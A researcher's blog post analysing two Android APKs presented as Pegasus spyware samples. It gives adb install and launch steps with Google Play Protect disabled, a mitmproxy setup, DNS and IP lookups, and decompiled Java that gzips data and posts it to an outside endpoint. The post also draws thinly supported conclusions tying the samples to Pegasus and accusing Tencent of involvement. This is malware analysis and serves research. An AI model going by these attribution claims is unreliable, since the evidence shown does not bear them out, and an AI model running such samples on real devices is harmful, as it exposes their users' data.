Pegasus Spyware — Untold — Chinese Engineering — Samples 1 & 2

Jonathan Scott
Dec 19, 2021


A Short Background

On July 28th, 2021, I uploaded four decompiled Pegasus Spyware samples provided by VX-UNDERGROUND.

website: https://www.vx-underground.org/
twitter: https://twitter.com/vxunderground

Pegasus Spyware Jonathan Scott Github Repository

I noticed that this repository was getting a lot of attention and was being shared all over the world. To my surprise, it ended up becoming a trending GitHub repository.

My intention was to bring awareness to the world in a way that had never been done before with Pegasus Spyware. I wanted researchers and engineers to study the code, and run the spyware on test devices so that we could all understand how this spyware functioned.

If we can understand it, we can develop solutions to stop, or at least impede, it. I had been aware of Pegasus Spyware for a while before @vxunderground released the samples, but even in July 2021 many Americans had never heard of it, and it was not until November 2021 that the US government deemed the spyware a risk to national security.

Source: https://appleinsider.com/articles/21/11/03/us-bans-nso-group-calls-pegasus-hacking-tool-national-security-risk

Reverse Engineering The Samples

I use Hopper Disassembler for macOS to take a first look through samples.

Source: https://www.hopperapp.com/

My typical quick process

A. Skim through the Hex View
B. Skim through the Pseudo Code
C. Skim through the ASM Procedures

I noticed something in the Hex View that caught my attention.

Ljava/lang/String

I immediately knew this was smali programming, and we had an Android app on our hands!

Smali Programming Example From Jonathan Scott Pegasus Spyware Repository
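As a rough illustration of the hex-view observation above, here is a minimal Python sketch that scans raw bytes for class descriptors of the form `Lpackage/Class;`. The same descriptor form is used in Java class files as well as in Android dex files, so a hit is a hint rather than proof. The sample bytes and the function name are made up for this example.

```python
import re

# Class descriptors look like "Lpackage/path/ClassName;".
# In a bytes pattern, \w only matches ASCII letters, digits and underscore.
DESCRIPTOR = re.compile(rb"L(?:[A-Za-z_$][\w$]*/)+[A-Za-z_$][\w$]*;")


def find_class_descriptors(data):
    """Return the unique class descriptors found in raw bytes, in first-seen order."""
    seen = {}
    for match in DESCRIPTOR.finditer(data):
        seen.setdefault(match.group().decode("ascii"), None)
    return list(seen)


# Hypothetical bytes standing in for a chunk of the hex view.
sample = b"\x00\x12Ljava/lang/String;\x00\x07Landroid/app/Activity;\x00Ljava/lang/String;"
print(find_class_descriptors(sample))
```

A descriptor under `Landroid/` is a stronger sign of an Android app than `Ljava/lang/String;` on its own.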

Smali Programming Language?

I won’t go into depth on this language right now, but for those who have never heard of smali, here is a good explanation and a resource to learn more about it.

smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)

Source: https://github.com/JesusFreke/smali

Creating Executable Spyware Samples

If I was going to put out executable samples, I needed to do the following, and disassembling the samples had already given me a big head start.

Step 1. Identify the code base these samples were written in

Step 2. Identify the operating system the samples can be installed on

Step 3. Identify the permissions needed to execute

Step 4. Install the samples on the correct operating system

Step 5. Capture data for validation

Analysis of The Chinese Code Written Into Android APKs

OK, now that we have the basic overview out of the way, let’s get into exactly why you are here.

The Pegasus Spyware Github repo has been on fire since July, 2021, but for as much as it has been shared, I have not seen one article about the elephant in the room.

WHY ARE THE APKS WRITTEN IN CHINESE?

There are countless articles about NSO Group being the creators of Pegasus. NSO Group is an Israeli company. Apple has recently filed a lawsuit against NSO Group “to curb the abuse of state-sponsored spyware.”

Source: https://www.apple.com/newsroom/2021/11/apple-sues-nso-group-to-curb-the-abuse-of-state-sponsored-spyware/

I find it strange that an Israeli company would write code comments in Chinese and create app GUIs with text written in Chinese. Has no one noticed this at all?

Steps To Install Pegasus Spyware Samples

1. Enable ADB on your Android device
2. Disable Google Play Protect
3. adb install sample1.apk
4. Launch the APK, for example:

adb shell am start com.xxGameAssistant.pao/.SplashActivity

I installed all samples below on the following device:

Samsung Galaxy S8+ (SM-G955U)
Android OS: 9.0
Rooted: No
Google Play Protect: OFF
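The install and launch steps above can be scripted. The following is a minimal Python sketch that only wraps the two adb commands already shown in this article. The helper names are my own, and it defaults to a dry run that prints the commands, so nothing touches a device unless you opt in.

```python
import subprocess


def install_command(apk_path):
    """argv for step 3: adb install <apk>."""
    return ["adb", "install", apk_path]


def launch_command(package, activity):
    """argv for step 4: adb shell am start <package>/<activity>."""
    return ["adb", "shell", "am", "start", f"{package}/{activity}"]


def run(argv, dry_run=True):
    """Print the command, and execute it only when dry_run is False."""
    print(" ".join(argv))
    if dry_run:
        return None
    return subprocess.run(argv, check=True, capture_output=True, text=True)


run(install_command("sample1.apk"))
run(launch_command("com.xxGameAssistant.pao", ".SplashActivity"))
```

Passing `dry_run=False` assumes adb is on your PATH and a test device is attached.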

Sample 1

com.xxGameAssistant.pao

This is a screenshot of Sample 1 running on an Android device.

Here is the sample1.apk screenshot translated from Chinese to English

Translation Source: https://translate.yandex.com/ocr

Well this is where things start to get interesting.

Let’s follow the sources.

We can see that we have a website, ww.xxzhushou.com, and a single DuckDuckGo search turns up the following GitHub repository.

Notice the icon in this GitHub repository: it’s the same icon that appears when you install sample 1.

When you look into more of the translated text you’re going to start making a lot of connections, but when you start making these connections you may experience a 连接超时 (timeout).

That was a bit of situational programming humor, by the way :)

Speaking of the “timeout,” when you look at sample 1, this is exactly what you will see in the code:

./sample1/recompiled_java/sources/com/xxGameAssistant/pao/MainActivity.java

How To Launch The Sample & Noteworthy Discovery

Sample 2

com.binary.sms.receiver

In order for us to get the application launch string we will send the following command to the device

adb shell pm dump com.binary.sms.receiver

We should have an output that looks like this, and we can see

com.binary.sms.receiver/.SkeletonActivity

We can now launch the installed app by sending the following command

adb shell am start com.binary.sms.receiver/.SkeletonActivity

After launching this application you will be presented with the following GUI.

This sample is noteworthy because this is the first time we see Pegasus named explicitly. We can see Pegasus defined in the logger.java file, and when we launch the sample through adb, we can see Pegasus in the verbose text output of adb logcat.

Note: a great way to find Chinese characters (or any other non-ASCII text) in a file tree is the following command:

pcre2grep -r -n '[^\x00-\x7f]' .

Chinese characters are often stored in an encoding the IDE does not detect automatically, so IDEs may not display them correctly unless you change the encoding detection.
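The pcre2grep pattern above matches any non-ASCII byte, so it also flags accented Latin text and other scripts. As a narrower alternative, here is a small Python sketch that reports only runs of CJK ideographs. The range used is an assumption that covers common Chinese text (it also matches Japanese kanji), and the demo file is invented for illustration.

```python
import os
import re
import tempfile

# CJK Unified Ideographs block (U+4E00 to U+9FFF). Assumption: this covers
# common Chinese text; rarer extension blocks are not matched.
CJK_RUN = re.compile(r"[\u4e00-\u9fff]+")


def find_cjk(root):
    """Return (relative_path, line_number, text) for every CJK run under root."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            # errors="ignore" lets the scan pass over binary files.
            with open(path, encoding="utf-8", errors="ignore") as handle:
                for number, line in enumerate(handle, start=1):
                    for match in CJK_RUN.finditer(line):
                        hits.append((os.path.relpath(path, root), number, match.group()))
    return hits


# Demo on a throwaway file; the file name and Java line are made up.
with tempfile.TemporaryDirectory() as root:
    with open(os.path.join(root, "Example.java"), "w", encoding="utf-8") as handle:
        handle.write('int retries = 3;\nString msg = "连接超时";\n')
    demo_hits = find_cjk(root)

print(demo_hits)
```

Note that text stored as `\uXXXX` escape sequences is plain ASCII on disk, so neither this sketch nor the pcre2grep command will find it without decoding the escapes first.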

Setting up the MITM on a compromised device

This process was annoying more than anything.

  1. Re-enable Google Play Protect
  2. Set a PIN or pattern lock (you can’t do step 3 without this)
  3. Install your MITM proxy .cer on the device
  4. Change your proxy settings in your current Wi-Fi config to point to the MITM server
  5. Re-install all the spyware
  6. Now you can run:
mitmproxy --intercept ip_of_spyware_phone

Pegasus Spyware Active Servers

Now that I had the MITM proxy running, I relaunched sample 2, and monitored the traffic.

I noticed a POST request:

POST http://tdcv3.talkingdata.net/g/d
Content-Length: 344
Content-Type: application/unpack_chinar
Host: tdcv3.talkingdata.net
Connection: Keep-Alive

I thought…surely this isn’t a live server, and then I saw the server request data, the response, and then the details.

Pegasus Spyware Active Server Request
Pegasus Spyware Active Server Response
Pegasus Spyware Active Server Details

We can see that the resolved IP address is:

35.241.63.213

This IP address belongs to Google’s servers, but it is just a proxy set up to gain authorization into the Android device without any issues.

This IP address is a trusted IP address and already has trusted credentials.

When we run the command

curl -I tdcv3.talkingdata.net

We can see that there is a proxy service

Via: 1.1 google
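To compare captured headers side by side, it helps to turn the raw text into a dictionary. Below is a minimal Python sketch that parses header lines such as the ones quoted in this article. The function name is my own, and the input strings are copied from the request and the `Via` line shown above.

```python
import re

# A header line is "Name: value"; request lines and status lines do not match.
HEADER_LINE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")


def parse_headers(raw):
    """Return {lowercased-name: value}; lines that are not headers are skipped."""
    headers = {}
    for line in raw.splitlines():
        match = HEADER_LINE.match(line.strip())
        if match:
            headers[match.group(1).lower()] = match.group(2).strip()
    return headers


request = parse_headers(
    "POST http://tdcv3.talkingdata.net/g/d\n"
    "Content-Length: 344\n"
    "Content-Type: application/unpack_chinar\n"
    "Host: tdcv3.talkingdata.net\n"
    "Connection: Keep-Alive\n"
)
response = parse_headers("Via: 1.1 google\n")
print(request["content-type"], "|", response["via"])
```

A `Via` header only tells you that at least one intermediary handled the response; it does not identify the origin server behind it.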

I needed to find the authoritative name servers for the domain and trace their A records to get to the real origin.

dig tdcv3.talkingdata.net
; <<>> DiG 9.10.6 <<>> tdcv3.talkingdata.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37584
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 19
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;tdcv3.talkingdata.net. IN A
;; ANSWER SECTION:
tdcv3.talkingdata.net. 137 IN A 35.241.63.213
;; AUTHORITY SECTION:
talkingdata.net. 80790 IN NS ns4.dnsv4.com.
talkingdata.net. 80790 IN NS ns3.dnsv4.com.
;; ADDITIONAL SECTION:
ns3.dnsv4.com. 163623 IN A 162.14.25.247
ns3.dnsv4.com. 163623 IN A 52.74.43.18
ns3.dnsv4.com. 163623 IN A 59.36.120.145
ns3.dnsv4.com. 163623 IN A 61.129.8.140
ns3.dnsv4.com. 163623 IN A 61.151.180.49
ns3.dnsv4.com. 163623 IN A 129.211.176.242
ns3.dnsv4.com. 163623 IN A 162.14.24.250
ns4.dnsv4.com. 163623 IN A 162.14.24.247
ns4.dnsv4.com. 163623 IN A 162.14.25.250
ns4.dnsv4.com. 163623 IN A 183.192.164.116
ns4.dnsv4.com. 163623 IN A 223.166.151.14
ns4.dnsv4.com. 163623 IN A 223.166.151.15
ns4.dnsv4.com. 163623 IN A 52.74.43.18
ns4.dnsv4.com. 163623 IN A 61.151.180.50
ns4.dnsv4.com. 163623 IN A 125.39.45.245
ns4.dnsv4.com. 163623 IN A 162.14.18.188
ns3.dnsv4.com. 163623 IN AAAA 2402:4e00:1430:1102:0:9136:2b2d:9c7
ns4.dnsv4.com. 163623 IN AAAA 2402:4e00:1020:1264:0:9136:29c0:144e
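The dig output above is easier to reason about once it is grouped by record name and type. Here is a rough Python sketch that does this for pasted dig text. The function name is my own, and the sample is a short excerpt of the output above rather than the full listing.

```python
from collections import defaultdict


def parse_dig_records(output):
    """Map (name, record_type) to the list of values found in dig output."""
    records = defaultdict(list)
    for line in output.splitlines():
        line = line.strip()
        # Comment, header and question lines all start with ";".
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue
        name, _ttl, _class, record_type = fields[:4]
        records[(name.rstrip("."), record_type)].append(" ".join(fields[4:]))
    return dict(records)


excerpt = """\
;; ANSWER SECTION:
tdcv3.talkingdata.net. 137 IN A 35.241.63.213
;; AUTHORITY SECTION:
talkingdata.net. 80790 IN NS ns4.dnsv4.com.
talkingdata.net. 80790 IN NS ns3.dnsv4.com.
;; ADDITIONAL SECTION:
ns3.dnsv4.com. 163623 IN A 162.14.25.247
ns3.dnsv4.com. 163623 IN A 52.74.43.18
"""

records = parse_dig_records(excerpt)
for key, values in records.items():
    print(key, values)
```

Grouping this way makes it clear which addresses belong to the queried host (the ANSWER section) and which belong to the domain's name servers (the ADDITIONAL section).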

The A Records

I wasn’t surprised to see the name servers’ A records resolving to Chinese servers, but my question is: how involved is Tencent in this?

Feel free to reach out to them via their verified Twitter page and ask them why they’re contributing to the Pegasus Spyware Project.

@TencentGlobal

curl ipinfo.io/162.14.25.247
{
"ip": "162.14.25.247",
"anycast": true,
"city": "Haidian",
"region": "Beijing",
"country": "CN",
"loc": "39.9906,116.2887",
"org": "AS132203 Tencent Building, Kejizhongyi Avenue",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/59.36.120.145
{
"ip": "59.36.120.145",
"hostname": "145.120.36.59.broad.dg.gd.dynamic.163data.com.cn",
"city": "Shenzhen",
"region": "Guangdong",
"country": "CN",
"loc": "22.5455,114.0683",
"org": "AS4134 CHINANET-BACKBONE",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/61.129.8.140
{
"ip": "61.129.8.140",
"city": "Shanghai",
"region": "Shanghai",
"country": "CN",
"loc": "31.2222,121.4581",
"org": "AS4811 China Telecom (Group)",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/61.151.180.49
{
"ip": "61.151.180.49",
"hostname": "49.180.151.61.dial.xw.sh.dynamic.163data.com.cn",
"city": "Shanghai",
"region": "Shanghai",
"country": "CN",
"loc": "31.2222,121.4581",
"org": "AS4811 China Telecom (Group)",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
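The four ipinfo.io lookups above can be summarized programmatically. This is a minimal Python sketch, assuming the responses have been saved as JSON strings. Only the `ip`, `country` and `org` fields from the output above are reproduced, and the helper names are my own.

```python
import json
from collections import Counter

# Trimmed copies of the four responses shown above.
RESPONSES = [
    '{"ip": "162.14.25.247", "country": "CN", "org": "AS132203 Tencent Building, Kejizhongyi Avenue"}',
    '{"ip": "59.36.120.145", "country": "CN", "org": "AS4134 CHINANET-BACKBONE"}',
    '{"ip": "61.129.8.140", "country": "CN", "org": "AS4811 China Telecom (Group)"}',
    '{"ip": "61.151.180.49", "country": "CN", "org": "AS4811 China Telecom (Group)"}',
]


def summarize(raw_responses):
    """Return (ip, country, asn, org_name) rows from ipinfo-style JSON strings."""
    rows = []
    for raw in raw_responses:
        info = json.loads(raw)
        # The "org" field starts with the AS number, then the organization name.
        asn, _, org_name = info["org"].partition(" ")
        rows.append((info["ip"], info["country"], asn, org_name))
    return rows


rows = summarize(RESPONSES)
asn_counts = Counter(asn for _ip, _country, asn, _name in rows)
print(asn_counts)
```

Of the four name server addresses looked up here, one sits in a Tencent AS and the other three in China Telecom networks.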

More Validation

Not only is Sample 2 calling back to

tdcv3.talkingdata.net/g/d

Sample 1 is also calling back to the same endpoint.

Source:

package com.tendcloud.tenddata;

import java.io.ByteArrayOutputStream;
import java.util.zip.GZIPOutputStream;
import org.apache.http.HttpHost;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.scheme.PlainSocketFactory;
import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.entity.ByteArrayEntity;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.BasicHttpParams;
import org.apache.http.params.HttpConnectionParams;

public final class o {
    private static final String a = "http://tdcv3.talkingdata.net";
    private static final String b = "/g/d";
    private static final int c = 60000;
    private static final boolean d = true;

    static DefaultHttpClient a() {
        HttpHost d2;
        int i = c;
        boolean b2 = u.b();
        new SchemeRegistry().register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
        BasicHttpParams basicHttpParams = new BasicHttpParams();
        HttpConnectionParams.setConnectionTimeout(basicHttpParams, b2 ? c : 120000);
        if (!b2) {
            i = 120000;
        }
        HttpConnectionParams.setSoTimeout(basicHttpParams, i);
        DefaultHttpClient defaultHttpClient = new DefaultHttpClient(basicHttpParams);
        if (!b2 && u.c() && (d2 = u.d()) != null) {
            defaultHttpClient.getParams().setParameter("http.route.default-proxy", d2);
        }
        return defaultHttpClient;
    }

    static boolean a(ah ahVar) {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        GZIPOutputStream gZIPOutputStream = new GZIPOutputStream(byteArrayOutputStream);
        new p(gZIPOutputStream).a(ahVar);
        gZIPOutputStream.finish();
        gZIPOutputStream.flush();
        return a(b, byteArrayOutputStream.toByteArray(), d);
    }

    static boolean a(String str, byte[] bArr, boolean z) {
        DefaultHttpClient a2 = a();
        try {
            HttpPost httpPost = new HttpPost(a + str);
            ByteArrayEntity byteArrayEntity = new ByteArrayEntity(bArr);
            byteArrayEntity.setContentType("application/unpack_chinar");
            httpPost.setEntity(byteArrayEntity);
            if (a2.execute(httpPost).getStatusLine().getStatusCode() == 200) {
                return d;
            }
            return false;
        } catch (Exception e) {
        }
    }
}
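The decompiled method `a(ah)` above writes its payload through a `GZIPOutputStream` before posting it, so a captured request body is presumably a gzip stream. Here is a minimal Python sketch for checking and unpacking such a body. The serialization done by class `p` is not shown in the listing, so the inner format stays unknown, and the placeholder bytes below are not real captured data.

```python
import gzip

# Values taken from the decompiled listing above.
ENDPOINT = "http://tdcv3.talkingdata.net" + "/g/d"
CONTENT_TYPE = "application/unpack_chinar"

GZIP_MAGIC = b"\x1f\x8b"


def looks_gzipped(body):
    """True when the body starts with the two gzip magic bytes."""
    return body[:2] == GZIP_MAGIC


def pack_body(serialized):
    """Mirror the sample: gzip the already-serialized bytes."""
    return gzip.compress(serialized)


def unpack_body(body):
    """Recover the serialized bytes from a captured request body."""
    return gzip.decompress(body)


# Placeholder payload standing in for whatever class `p` writes.
placeholder = b"placeholder-serialized-record"
body = pack_body(placeholder)
print(looks_gzipped(body), unpack_body(body) == placeholder)
```

With a real capture, you would save the request body from the proxy to a file and pass its bytes to `unpack_body`.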

Lastly, you can look up this data for further validation on Hybrid Analysis.

I will be posting the Samples 3–5 deep dive on Tuesday, December 21st, 2021.

Jonathan Scott

B.A. — Philosophy
M.S — Computer Science
PhD — Computer Science — Current Student

website: https://www.0hak.com/
github: https://github.com/jonathandata1/pegasus_spyware
twitter: https://twitter.com/jonathandata1

Keep The Red Bull Flowing https://www.buymeacoffee.com/jonathandata1
